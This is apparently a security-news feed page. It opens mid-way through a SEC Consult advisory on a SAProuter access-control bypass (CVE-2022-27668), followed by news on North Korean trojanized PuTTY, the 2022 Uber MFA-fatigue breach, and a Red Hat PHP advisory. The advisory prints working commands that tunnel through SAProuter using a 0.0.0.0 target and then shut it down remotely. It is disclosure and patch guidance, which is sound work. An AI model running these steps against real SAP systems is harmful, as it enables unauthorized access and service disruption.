-t 127.0.0.1 -r 3299 -a 127.0.0.1 -l 3299 -v  
[*] Setting a proxy between 127.0.0.1:3299 and remote SAP Router 192.168.  
56.103:3299 (talk mode raw)  
SAPNIProxy: Binded to address 127.0.0.1:3299, proxying to 192.168.56.103:  
3299  
Routing to 127.0.0.1:3299  
To send 61 bytes data + 4 bytes NI header  
Received 4 bytes NI header, to receive 211 bytes data  
Received 211 bytes data  
Route request to 127.0.0.1:3299 not accepted by 192.168.56.103:3299  
--------------------------------------------------------------------------

It was discovered that it is possible to circumvent this check using  
the non-standard IPv4 broadcast address 0.0.0.0 (see RFC5735, RFC1122).  
When specifying destination host 0.0.0.0 and destination port 3299,  
this leads to an effective access control bypass as can be seen in the  
following listing.

--------------------------------------------------------------------------  
attacker@192.168.56.104$ python router_portfw.py -d 192.168.56.103 -p 3299  
-t 0.0.0.0 -r 3299 -a 127.0.0.1 -l 3299 -v  
[*] Setting a proxy between 127.0.0.1:3299 and remote SAP Router 192.168.  
56.103:3299 (talk mode raw)  
SAPNIProxy: Binded to address 127.0.0.1:3299, proxying to 192.168.56.103:  
3299  
Routing to 0.0.0.0:3299  
To send 59 bytes data + 4 bytes NI header  
Received 4 bytes NI header, to receive 8 bytes data  
Received 8 bytes data  
Route request to 0.0.0.0:3299 accepted by 192.168.56.103:3299

attacker@192.168.56.104$ ss -antlp | grep "3299"  
LISTEN 0    5  127.0.0.1:3299  0.0.0.0:*  users:(("python",pid=1985,fd=3))  
--------------------------------------------------------------------------

Once the tunnel is established, an attacker can leverage administrative  
functions using its local port 3299 which is forwarded to the loopback  
interface of the remote SAProuter instance. For example, the Python  
script router_admin.py [3] of the pysap framework can be used to  
shutdown (option -s) the running SAProuter instance on the remote host.

--------------------------------------------------------------------------  
attacker@192.168.56.104$ python router_admin.py -s -d 127.0.0.1 -p 3299  
[*] Requesting stop of the remote SAP Router  
[*] Connected to the SAP Router 127.0.0.1:3299  
[*] Using SAP Router version 40  
[*] Sending Router Admin packet

netwadm@192.168.56.103$ ./saprouter -r

trcfile dev_rout  
no logging active

WARNING: wildcard character used in route target

shutdown message received, good bye ...  
--------------------------------------------------------------------------

External links:  
[2] https://github.com/SecureAuthCorp/pysap/blob/master/examples/router_portfw.py  
[3] https://github.com/SecureAuthCorp/pysap/blob/master/examples/router_admin.py

Vulnerable / tested versions:  
-----------------------------  
The following versions of the binary were found to be vulnerable during our tests:

- SAProuter as part of kernel 753 patch no. 400 (Linux, 64 BIT UNICODE)  
- SAProuter as part of kernel 777 patch no. 200 (Linux, 64 BIT UNICODE)

No additional testing on other releases has been carried out. According to the vendor  
the following releases and versions are affected by the discovered vulnerability:

- KRNL64NUC     7.49        
- KRNL64UC      7.49        
- SAP_ROUTER    7.53        
- SAP_ROUTER    7.22        
- KERNEL        7.49        
- KERNEL        7.77        
- KERNEL        7.81        
- KERNEL        7.85        
- KERNEL        7.86        
- KERNEL        7.87        
- KERNEL        7.88

Vendor contact timeline:  
------------------------  
2022-02-25: Contacting vendor through vulnerability submission web form.  
2022-03-05: Vendor confirms receipt and assigns internal ID #2270010706.  
2022-04-04: Requesting status update.  
2022-04-05: Vendor confirms vulnerability and states that a fix is already  
             complete. The corresponding security note is expected to be  
             released with the upcoming April 2022 patch day.  
2022-04-12: Patch day April 2022 passed without release.  
2022-05-10: Patch day May 2022 passed without release.  
2022-06-14: Vendor releases patch with SAP Security Note 3158375.  
2022-06-14: Requesting confirmation that the finding was fixed by the  
             published security note as no prior notification was provided.  
2022-06-28: Vendor confirms that the patch included in Security Note 3158375  
             fixes the issue. The vulnerability got assigned CVE-2022-27668.  
2022-09-14: Release of this security advisory.

Solution:  
---------  
The vendor provides a patched version which should be installed immediately.  
The software can be obtained via the SAP service marketplace. Further  
information can be found in the corresponding Security Note 3158375 [4].

[4] https://launchpad.support.sap.com/#/notes/3158375

Workaround:  
-----------  
Remove any wildcard (*) values in the target host or IP address directive  
in route permission table saprouttab entries 'P' and 'S'. In general, it  
is recommended to not make use of any wildcard values in the route permission  
table saprouttab. Additional information on the secure configuration of  
SAProuter can be found in SAP Security Note/KBA 1895350 [5].

[5] https://launchpad.support.sap.com/#/notes/1895350

Advisory URL:  
-------------  
https://sec-consult.com/vulnerability-lab/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult, an Atos company  
Europe | Asia | North America

About SEC Consult Vulnerability Lab  
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an  
Atos company. It ensures the continued knowledge gain of SEC Consult in the  
field of network and application security to stay ahead of the attacker. The  
SEC Consult Vulnerability Lab supports high-quality penetration testing and  
the evaluation of new offensive and defensive technologies for our customers.  
Hence our customers obtain the most current information about vulnerabilities  
and valid recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Interested to work with the experts of SEC Consult?  
Send us your application https://sec-consult.com/career/

Interested in improving your cyber security with the experts of SEC Consult?  
Contact our local offices https://sec-consult.com/contact/  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: security-research at sec-consult dot com  
Web: https://www.sec-consult.com  
Blog: http://blog.sec-consult.com  
Twitter: https://twitter.com/sec_consult

EOF F. Hagg / @2022

SAP SAProuter Improper Access Control

A threat with a North Korea nexus has been found leveraging a "novel spear phish methodology" that involves making use of trojanized versions of the PuTTY SSH and Telnet client.
Google-owned threat intelligence firm Mandiant attributed the new campaign to an emerging threat cluster it tracks under the name UNC4034.
"UNC4034 established communication with the victim over WhatsApp and lured them

A threat with a North Korea nexus has been found leveraging a "novel spear phish methodology" that involves making use of trojanized versions of the PuTTY SSH and Telnet client.

Google-owned threat intelligence firm Mandiant attributed the new campaign to an emerging threat cluster it tracks under the name **UNC4034**.

"UNC4034 established communication with the victim over WhatsApp and lured them to download a malicious ISO package regarding a fake job offering that led to the deployment of the AIRDRY.V2 backdoor through a trojanized instance of the PuTTY utility," Mandiant researchers said.

The use of fabricated job lures as a pathway for malware distribution is an oft-used tactic by North Korean state-sponsored actors, including the Lazarus Group, as part of an enduring campaign called Operation Dream Job.

The entry point of the attack is an ISO file that masquerades as an Amazon Assessment as part of a potential job opportunity at the tech giant. The file was shared over WhatApp after establishing initial contact over email.

The archive, for its part, holds a text file containing an IP address and login credentials, and an altered version of PuTTY that, in turn, loads a dropper called DAVESHELL, which deploys a newer variant of a backdoor dubbed AIRDRY.

It's likely that the threat actor convinced the victim to launch a PuTTY session and use the credentials provided in the TXT file to connect to the remote host, effectively activating the infection.

AIRDRY, also known as BLINDINGCAN, has in the past been used by North Korea-linked hackers to strike U.S. defense contractors and entities in South Korea and Latvia.

While earlier versions of the malware came with nearly 30 commands for file transfer, file management, and command execution, the latest version has been found to eschew the command-based approach in favor of plugins that are downloaded and executed in memory.

Mandiant said it was able to contain the compromise before any further post-exploitation activities could take place following the deployment of the implant.

The development is yet another sign that the use of ISO files for initial access is gaining traction among threat actors to deliver both commodity and targeted malware.

The shift is also attributable to Microsoft's decision to block Excel 4.0 (XLM or XL4) and Visual Basic for Applications (VBA) macros for Office apps downloaded from the internet by default.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

North Korean Hackers Spreading Trojanized Versions of PuTTY Client Application

Categories: News
Tags: Uber

Tags:  MFA

Tags:  push notification

Tags:  Slack

Tags:  HackerOne

Uber was forced to take several systems offline after reports of a serious breach



(Read more...)




The post Uber hacked appeared first on Malwarebytes Labs.

Uber informed the public on Thursday it was responding to a cybersecurity incident after somebody breached its network. From what we have been able to find out so far, the attacker managed to compromise an employee’s access to the chat app Slack. The intruder may also have gained access to the Amazon and Google-hosted cloud environments where Uber stores its source code and customer data, and to the company's HackerOne account, which contains information about security flaws in its products.

> We are currently responding to a cybersecurity incident. We are in touch with law enforcement and will post additional updates here as they become available.
> 
> — Uber Comms (@Uber\_Comms) September 16, 2022

There has been no indication that Uber’s fleet of vehicles or its operation was affected.

Security researchers that spoke with the hacker, who claims to be 18 years of age, are under the impression that the threat actor’s main motive seems to be to show off what he did. The person also said Uber drivers should receive higher pay.

A highly respected source revealed that the threat actor spammed an employee with MFA push requests, an established tactic that can defeat some kinds of multi-factor authentication by simply annoying a victim into submission. This type of MFA sends a notification to a user whenever their username and password are used. The user has to approve the login by pressing a button on a smartphone app. The idea is that a stolen username and password are useless to an attacker unless they also have physical access to the victim's phone. It doesn't always work like that though. Unfortunately, some criminals have learned that they can batter people into submission by repeatedly using the username and password until the victim approves the login just to make the notifications stop.

In this case the attacker reportedly contacted the employee on WhatsApp and told them they had to accept the requests to make them stop, at which point the victim did as instructed.

**Slack**

Slack is a messaging system that's widely used by, and within, tech companies as an alternative to email. It allows direct messages between individuals, and conversations among groups of people take place in channels dedicated to specific topics or areas of concern. Channels contain a complete history of every conversation they have ever hosted, and may contain sensitive or valuable information. In other words, Slack can be a potential gold mine for an attacker looking to expand their access and impact.

The New York Times reports that Uber was forced it to take several internal communications and engineering systems offline after the attacker used Slack to send a message to Uber employees.

The Slack message, including spelling errors, read:

> “I announce I am a hacker and uber has suffered a data breach. Slack has been stolen, confidential data with Confluence, stash and two monorepos from phabricator have also been stolen, along with secrets from sneakers. #uberunderpaisdrives”

The message was received as a joke by Uber's employees in the Slack channel at first, but people soon started realizing the claims were serious. To prove that the intruder really had access they posted a photo on an internal information page for employees, as well as screenshots of the Uber AWS instance, HackerOne administration panel, and more.

HackerOne is a vulnerability coordination and bug bounty platform that connects businesses who want to know about security issues in their products with penetration testers and cybersecurity researchers looking to be rewarded for their bug-hunting efforts.

I suppose if there is one thing you don’t want a hacker to get their hands on, it’s the company’s HackerOne administration panel. Imagine someone having access to a list of unfixed security vulnerabilities affecting your organization, alongside proof-of-concept code that can exploit them.

We reached out to HackerOne to ask about the security measures that apply to a company account. We are awaiting their response.

**No hush, hush this time**

Uber famously covered up a 2016 data breach that affected its 57 million customers and drivers. The company hid the incident from the public and paid the hackers $100,000 to delete the data and keep quiet. That Uber hack came to light after new leadership took over the company in 2017, a year after the incident occurred. Uber settled the case with the DOJ (US Department of Justice) and paid  $148M for civil litigation settlement.

Uber hacked

Red Hat Security Advisory 2022-6542-01 - PHP is an HTML-embedded scripting language commonly used with the Apache HTTP Server. Issues addressed include file overwrite and traversal vulnerabilities.

Tag

#sap